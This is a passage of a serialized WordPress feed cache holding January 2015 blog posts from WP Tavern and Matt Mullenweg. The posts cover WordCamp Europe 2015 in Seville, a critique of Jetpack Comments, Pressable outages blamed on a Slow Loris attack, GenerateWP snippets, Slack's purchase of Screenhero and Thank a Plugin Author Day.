\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WPTavern: Seville, Spain to Host WordCamp Europe 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38031\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"http://wptavern.com/seville-spain-to-host-wordcamp-europe-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3322:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/seville.jpg\" rel=\"prettyphoto[38031]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/seville.jpg?resize=1025%2C505\" alt=\"seville\" class=\"aligncenter size-full wp-image-38107\" /></a></p>\n<p>The WordCamp Europe organization team <a href=\"http://europe.wordcamp.org/2015/wceu-2015-lets-go/\" target=\"_blank\">announced</a> today that the 2015 event will be held in Seville, Spain from June 26 – 28 at the <a href=\"http://www.hotelbarcelorenacimiento.com/\" target=\"_blank\">Barceló Gran Hotel Renacimiento</a>. Last year’s <a href=\"http://wptavern.com/wordpress-beyond-boundaries-a-recap-of-wordcamp-europe-2014\" target=\"_blank\">WordCamp in Sofia, Bulgaria</a> was a tremendous success with nearly 800 attendees, a world-class speaker lineup, and a strong local community of volunteers.</p>\n<p>Ordinarily, the WCEU organizers select a host city based on applications from various European WordPress communities after an open call. However, this year is an exception. WordCamp Central prevailed upon the team to have the event in late spring or summer in order to accommodate WordCamp US, which is expected to take place in the fall.</p>\n<p>“As we had to move WordCamp Europe to the first half of the year, we were quite limited in time,” organizer Petya Raykovska said. “So instead of publishing an open call for applications, we decided to reach out to some of the best established WordPress communities in Europe that have experienced teams of local organizers and asked them to prepare bids to host WCEU 2015. We received three very good applications from three different teams.”</p>\n<p>The WCEU organization team landed on Seville after considering various factors, such as the local organizers’ preparation of the budget and venue research. “We chose Seville because of the excellent job they did with the application,” Raykovska said. “But also because of the great, experienced local team, because it’s a great location with a very different vibe from Sofia – it’s affordable, well connected with the rest of Europe, and has a very strong local WordPress community.”</p>\n<p>The WordPress community in Seville has held a local <a href=\"https://twitter.com/wcsevilla\" target=\"_blank\">WordCamp</a> for the past several years. The city’s metropolitan area has approximately 1.5 million residents, making it a decent-sized city for hosting an event. Attendees should expect to pack for warm weather, as the Seville’s average high temperatures in the summer often reach above 35 °C.</p>\n<p><a href=\"http://siobhanmckeown.com/\" target=\"_blank\">Siobhan McKeown</a> will be leading a team of 18 <a href=\"http://europe.wordcamp.org/2015/organizers/\" target=\"_blank\">organizers</a> for the 2015 event, including five experienced local organizers and a global team of organizers from all over Europe.</p>\n<p>Tickets will go on sale at the beginning of February, and the organization team will be calling for speakers and sponsors in the next few days. Unlike last year’s event, WordCamp Europe 2015 will include interpretation for the local language. While all sessions will be given in English, a Spanish translation will be offered simultaneously.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 20:37:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"WPTavern: Why Jetpack Comments is Not A Great Alternative to WordPress’ Native Comment Form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38091\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"http://wptavern.com/why-jetpack-comments-is-not-a-great-alternative-to-wordpress-native-comment-form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7500:\"<p>Jetpack ships with more than <a title=\"http://jetpack.me/\" href=\"http://jetpack.me/\">30 different modules </a>including, <a title=\"http://jetpack.me/support/comments/\" href=\"http://jetpack.me/support/comments/\">Jetpack Comments</a>. One of its primary features is allowing people to login using credentials from their WordPress.com, Twitter, Facebook, or Google+ accounts.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/JetpackCommentForm.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-38094\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/JetpackCommentForm.png?resize=499%2C374\" alt=\"Jetpack Comments Form\" /></a>Jetpack Comments Form\n<p>This module has replaced the WordPress native comment form for nearly two years on WP Tavern. It makes it easier for people on social networks to post a comment, but the convenience comes with several drawbacks.</p>\n<h2>Lack of a Graceful Fallback</h2>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/JetpackCommentsOutOfFuel.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-20439\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/JetpackCommentsOutOfFuel.png?resize=646%2C201\" alt=\"Jetpack Comments Temporarily Offline\" /></a>Out Of Fuel\n<p>In early 2014, <a title=\"http://wptavern.com/the-combination-of-jetpack-and-dreamhost-security-settings-lead-to-lost-comments\" href=\"http://wptavern.com/the-combination-of-jetpack-and-dreamhost-security-settings-lead-to-lost-comments\">several Tavern readers experienced</a> <strong>Service Temporarily Unavailable</strong> errors when trying to submit a comment. The error was caused by a security setting with <a title=\"http://www.modsecurity.org/\" href=\"http://www.modsecurity.org/\">mod_security</a> on DreamHost and exposed the lack of a graceful fallback. Instead of displaying an error, the iFrame should have been replaced with the native comment form. I <a title=\"https://github.com/Automattic/jetpack/issues/446\" href=\"https://github.com/Automattic/jetpack/issues/446\">created an issue</a> on Github explaining the problem and although it gained immediate attention, not much has happened since.</p>\n<h2>Annoying Page Refreshes</h2>\n<p>It’s normal for articles on the Tavern to have several comments with multi-threaded conversations. I’ve discovered that Jetpack Comments will sometimes take me to a different part of the page after I reply to a comment instead of taking me to where the comment is published. It doesn’t happen all the time, but when it does, it’s annoying.</p>\n<p>It’s 2015, 10 years after the term <a title=\"http://www.adaptivepath.com/ideas/ajax-new-approach-web-applications/\" href=\"http://www.adaptivepath.com/ideas/ajax-new-approach-web-applications/\">Ajax was coined by Jesse James Garrett</a>. Ajax stands for Asynchronous JavaScript + XML. It’s a collection of technologies that provide near real-time interaction with page elements. For example, if you leave a comment on a site running the <a title=\"http://p2theme.com/\" href=\"http://p2theme.com/\">P2 theme</a>, it will appear on the site without refreshing the page.</p>\n<p>Page refreshes are distracting, annoying, and break the flow of a conversation. I’m <a title=\"http://wordpress.org/support/topic/i-was-expected-some-other-fu?replies=2\" href=\"http://wordpress.org/support/topic/i-was-expected-some-other-fu?replies=2\">not the first one</a> to request Jetpack Comments be Ajaxified. In an <a title=\"https://github.com/Automattic/jetpack/issues/833#issuecomment-67605046\" href=\"https://github.com/Automattic/jetpack/issues/833#issuecomment-67605046\">issue on Jetpack’s Github account</a>, George Stephanis, who is a member of the Jetpack development team explains that, while theoretically possible, it’s not high on the priority list.</p>\n<blockquote><p>It’s theoretically possible passing the event through JS <code>window.postMessage</code> — but to actually render the comment would take some theme integration that we can’t presently assume. If someone wanted to write this I’d be fine accepting a pull request that fires an event and passes some limited data back, like the comment ID and status or something, but it’s not high on the priority list.</p></blockquote>\n<p>The ticket has gained little traction with no signs of Ajax support being added anytime soon. His response is similar to Matt Mullenweg’s in <a title=\"http://wptavern.com/wpweekly-episode-130-catching-up-with-matt-mullenweg\" href=\"http://wptavern.com/wpweekly-episode-130-catching-up-with-matt-mullenweg\">episode 130 of WordPress Weekly</a>, when I asked him <a title=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\" href=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\">why comments haven’t changed much</a> in WordPress over the years, “It’s very difficult to iterate comments as it’s hard to get those changes to be compatible with every WordPress theme in the world.”</p>\n<h2>It’s Not Highly Extendable</h2>\n<p>One of the biggest problems I have with Jetpack Comments is that it’s not easily extendable using plugins. Since it’s an iFrame hosted on WordPress.com, it’s hard to manipulate and is an <strong>all or nothing </strong>approach.</p>\n<h2>The Old Comment Form</h2>\n<p>In 2011, I used <a title=\"http://wptavern.com/how-to-mimic-the-wptavern-commenting-system\" href=\"http://wptavern.com/how-to-mimic-the-wptavern-commenting-system\">a collection of plugins</a> to add features to the native comment form so it felt more like a reply box on a forum. Readers had the ability to style and preview comments without having to write code. They could also subscribe to the thread and edit their comment afterwards for up to 10 minutes.</p>\n<p>However, my favorite feature was the Reply link next to each comment. When clicked, the name along with a link to the comment id was automatically added to the comment form. For example, <strong>@<a href=”#comment-11784″ rel=”reply”>Name of Awesome Commenter</a> – Comment text here</strong>. Since the theme didn’t support threaded comments at the time, this feature came in handy.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/OldTavernCommentForm.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-38095\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/OldTavernCommentForm.png?resize=625%2C657\" alt=\"Comment Form Used on The Tavern in 2011\" /></a>Comment Form Used on The Tavern in 2011\n<p>Although some of the features are replicated in Jetpack Comments, the old form felt like a better experience to me. If you’re a long time commenter on the Tavern, I’m curious if you feel the same way?</p>\n<h2>I Don’t Recommend Jetpack Comments</h2>\n<p>In an era where Twitter, Facebook, etc. provide the ability for real-time communication, Jetpack Comments and the default comment system in WordPress feels like ancient technology. If all you need is an easy way for people to login using their social media accounts to post a comment, Jetpack Comments is a good solution. However, if you need something more robust, look elsewhere.</p>\n<p>Unless the team adds Ajax support for comment submissions and makes the module more extendable, I can’t recommend it as a viable alternative to the native comment form in WordPress.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 18:54:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Recent Pressable Outages the Result of a Slow Loris Attack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38064\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wptavern.com/recent-pressable-outages-the-result-of-a-slow-loris-attack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3011:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/slow-loris.jpg\" rel=\"prettyphoto[38064]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/slow-loris.jpg?resize=700%2C346\" alt=\"photo credit: BBC Nature\" class=\"size-full wp-image-38071\" /></a>photo credit: <a href=\"http://www.bbc.co.uk/nature/life/Slow_loris\">BBC Nature</a>\n<p>Last week, <a href=\"https://pressable.com/\" target=\"_blank\">Pressable</a> was engaged in a 24/7 struggle to keep its customers’ sites operational. The <a href=\"http://wptavern.com/pressable-struggles-to-retain-customers-following-recent-outages\" target=\"_blank\">recent outages</a> caused some customers 24+ hours of downtime and many closed their accounts in favor of finding an alternative host. Today the company announced that the root cause of the outage customers experienced the week of January 19, 2015, was an intentional attack on Pressable’s systems.</p>\n<p>A <a href=\"https://pressable.com/blog/2015/01/28/root-cause-analysis-outage-week-january-19-2015/\" target=\"_blank\">post</a> on the company’s blog further breaks down the attack: <strong>“Ultimately, the reason for this outage was a well crafted attack on our systems. The attack was a variant of the “<a href=\"http://en.wikipedia.org/wiki/Slowloris_%28software%29\" target=\"_blank\">Slow-Loris</a>” attack discovered in 2009.”</strong></p>\n<p>The attack went undetected because of the insidious manner in which it was executed. Pressable has been working with security professionals to get the attack under control and announced <a href=\"http://status.pressable.com/2015/01/24/all-systems-operational/\" target=\"_blank\">all systems operational</a> on Monday.</p>\n<p>A week ago, after hearing about Pressable’s continued struggle with downtime, I asked CEO Vid Luther if the company was being intentionally sabotaged. At the time, he didn’t think that an attack was a real possibility:</p>\n<blockquote><p>I do not believe that anyone who has an agenda against Pressable is behind these issues. I’m not aware of anyone who has an agenda against Pressable, besides the general competition in the WordPress hosting space, and currently, some of them are acting like vultures. But, I don’t think those guys have the ability to orchestrate something like this. So, unfortunately, no conspiracy theory from our side.</p></blockquote>\n<p>While working to mitigate customer downtime, the Pressable team discovered the coordinated attack on their systems. The attacker’s sophisticated method of sabotaging Pressable went undetected, because it was made to appear that the host’s infrastructure was being overloaded.</p>\n<p>The knowledge of the attack came after multiple apologies from Luther, who originally identified Pressable’s lagging infrastructure as the cause. Luther told the Tavern that he has an idea of who the attackers are but will be digging into it further before calling out any parties publicly.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 22:43:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: GenerateWP Introduces WordPress Custom Code Snippets\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37861\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"http://wptavern.com/generatewp-introduces-wordpress-custom-code-snippets\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5357:\"<p><a href=\"http://generatewp.com/\" target=\"_blank\">GenerateWP</a>, the popular WordPress code generator site, is celebrating two years in operation this week. The site, founded by <a href=\"https://profiles.wordpress.org/ramiy\" target=\"_blank\">Rami Yushuvaev</a>, launched with five code generators and now has more than 20. Yushuvaev sees the site as an educational tool that helps WordPress developers learn more about coding best practices.</p>\n<p>Before launching GenerateWP, Yushuvaev created <a href=\"http://www.wp-tricks.co.il/generator/\" target=\"_blank\">three code generators</a> to serve the Israeli WordPress community. The site was an instant success, which prompted him to translate it into English and launch GenerateWP in January 2013.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-hebrew.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-hebrew.jpg?resize=727%2C221\" alt=\"generatewp-hebrew\" class=\"aligncenter size-full wp-image-38035\" /></a></p>\n<p>The first week after launching, Yushuvaev was approached by a major brand that offered to buy the site and a few developers made offers to finance more generators. “I decided that it wasn’t the right time to give up the site, since I had big plans for it and for the WordPress community,” he said.</p>\n<p>The site has 15K+ registered WordPress developers and averages 100,000 visitors per month, most of whom are designers and developers. During the past two years, Yushuvaev worked with contributors Maor Chasen and Ohad Raz to rewrite the entire code base to use object-oriented programming and make it work better with WordPress.</p>\n<p>In celebration of the site’s two year birthday, GenerateWP is introducing custom code snippets, which will allow users to save their own snippets in a public and/or private library. “Front-end designers use <a href=\"http://Codepen.io\" target=\"_blank\">codepen.io</a> to showcase their code, JavaScript developers use <a href=\"http://jsfiddle.net\" target=\"_blank\">jsfiddle.net</a>, Bootstrap developers have <a href=\"http://bootsnipp.com\" target=\"_blank\">bootsnipp.com</a>, and now WordPress developers have <a href=\"http://GenerateWP.com\" target=\"_blank\">GenerateWP.com</a>,” Yushuvaev said.</p>\n<p>The site now includes a collective <a href=\"http://generatewp.com/snippet/\" target=\"_blank\">library of public snippets</a> shared with the community. Users can also browse public snippets by author.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/rami-snippets.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/rami-snippets.jpg?resize=963%2C458\" alt=\"rami-snippets\" class=\"aligncenter size-full wp-image-38047\" /></a></p>\n<p>Individual <a href=\"http://generatewp.com/snippet/nvMganl/\" target=\"_blank\">snippets</a> allow users to share, download, or clone the code into their own libraries. Developers can embed snippets on their sites, send them to <a href=\"http://pastebin.com/\" target=\"_blank\">Pastebin</a>, or create a <a href=\"https://gist.github.com/\" target=\"_blank\">GitHub gist</a>.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-snippets.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-snippets.jpg?resize=957%2C483\" alt=\"generatewp-snippets\" class=\"aligncenter size-full wp-image-38049\" /></a></p>\n<h3>Future Plans for Expanding GenerateWP</h3>\n<p>Yushuvaev has plans to monetize the site further down the road but said that the generators and code snippets will always remain free. “The money will come from other services,” he said. “I can’t reveal our plans but you can expect a game changing feature for our premium users.”</p>\n<p>In the meantime, the team plans to create new code generators, including a tool to generate widgets, a meta box generator, and admin menu page generators. In the coming weeks, the site will also provide an oEmbed option to embed snippets using nothing but the URL.</p>\n<p>Currently, the most popular generators on the site are the ones for creating custom post types, shortcodes, and custom taxonomies. Yushuvaev is optimistic that the site will continue to grow as more developers discover how much time they can save with the generators.</p>\n<p>I was writing the same code over and over again (post types and taxonomies) for different clients,” he said. “Creating an automatic generator to save some time was the next logical step.” He found that writing code eats up plenty of time and did not want to utilize free plugins, as they often do not remain in active development.</p>\n<p>GenerateWP is quickly becoming a popular tool for WordPress educators. “The site is used in WordPress classes around the world to teach new developers how to properly code using WordPress coding standards,” Yushuvaev said. “We managed to confirm a class in Thailand, universities and colleges in Israel, United States, Canada, and Germany.</p>\n<p>“We also have received requests to translate our tools to other languages,” he said. The GenerateWP team plans to add translations in the near future to open up the site to more international users.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 21:20:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Matt: Slack Buys Screenhero\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44638\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"http://ma.tt/2015/01/slack-buys-screenhero/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:534:\"<p><a href=\"http://techcrunch.com/2015/01/28/slack-buys-screenhero-to-add-screen-sharing-and-voice-chat-to-its-work-messaging-platform/\">Slack Buys Screenhero To Add Screen Sharing And Voice Chat To Its Work Messaging Platform</a>, which I’m very excited about as a daily user of Slack (on 5 teams now) and through <a href=\"http://audrey.co/\">Audrey</a> an investor in <a href=\"https://screenhero.com/\">Screenhero</a> and a big fan of their vision. As the article mentions, Automattic has been a Screenhero customer as well.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 19:47:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"WPTavern: Thank a Plugin Author Day 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37980\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"http://wptavern.com/thank-a-plugin-author-day-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2579:\"<p><a title=\"https://wordpress.org/news/2009/01/thank-a-plugin-developer-day/\" href=\"https://wordpress.org/news/2009/01/thank-a-plugin-developer-day/\">Created by Matt Mullenweg in 2009,</a> when the <a title=\"https://wordpress.org/plugins/\" href=\"https://wordpress.org/plugins/\">plugin directory</a> hosted only 4K plugins, Thank a Plugin Author Day (January 28th) motivates users to thank plugin authors.</p>\n<p>There are several ways to celebrate the event, such as visiting the plugin author’s website. The link is usually available via the plugin’s page on WordPress.org. You can also find a link to the author’s website by searching for the plugin in the backend of WordPress. Also, most plugins in the directory have a link to give a monetary donation.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/PluginDonationLink.png\" rel=\"prettyphoto[37980]\"><img class=\"size-full wp-image-38009\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/PluginDonationLink.png?resize=975%2C527\" alt=\"Plugin Donation Link\" /></a>Plugin Donation Link\n<p>Another way to thank plugin authors is to rate and review their plugins. Ratings and reviews are <a title=\"http://wptavern.com/rate-and-review-a-wordpress-plugin-day-set-for-october-17th\" href=\"http://wptavern.com/rate-and-review-a-wordpress-plugin-day-set-for-october-17th\">an easy way to send feedback</a> directly to an author. Make sure to provide actionable feedback instead of one or two-word reviews. A side effect of rating and reviewing plugins, is that it’s one of many ways to contribute back to the WordPress project.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/11/BillionThanksFeaturedImage.png\" rel=\"prettyphoto[37980]\"><img class=\"size-full wp-image-34331\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/11/BillionThanksFeaturedImage.png?resize=796%2C267\" alt=\"Billion Thanks Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/opensourceway/7007768456/\">opensourceway</a> – <a href=\"http://creativecommons.org/licenses/by-sa/2.0/\">cc</a>\n<p>Since the holiday’s creation, over 31K plugins have been added to the directory which results in nearly 36K reasons to use WordPress! <strong>Thank you</strong> to anyone who has ever published a WordPress plugin whether it’s on the <a title=\"https://wordpress.org/plugins/\" href=\"https://wordpress.org/plugins/\">official directory</a> or on GitHub. Without so many plugins, I wouldn’t be able to customize WordPress to make it my own.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 07:05:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Envato Stats, Tips For Getting Things Done, and More at PressNomics 